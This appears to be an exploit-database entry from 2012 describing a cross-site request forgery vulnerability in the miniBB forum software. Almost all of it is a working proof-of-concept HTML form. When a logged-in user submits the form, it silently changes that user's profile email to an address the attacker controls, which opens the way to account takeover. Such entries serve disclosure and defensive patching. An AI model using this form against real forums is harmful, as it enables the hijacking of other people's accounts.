id: 17716
date: 03/14/2012
title: miniBB CSRF Vulnerability
author: Jonturk75
cves: 

# Exploit Title: miniBB CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/minibb/1418/
# Category::  webapps
# Demo : http://minibb.org/minibb-test.php
# Greetz: Inj3ct0r Exploit DataBase 1337day.com



<form class="formStyle" method="post" name="regform" action="target.com/[PATH]/action=prefs">
<input type="hidden" style="width: 200px;" class="textForm" value="ghappa@gmail.com" size="20" maxlength="50" name="email"/>
<input type="submit" class="inputButton" value="Edit Profile"/></td>
</form>



#  0day.today [2023-03-26]  #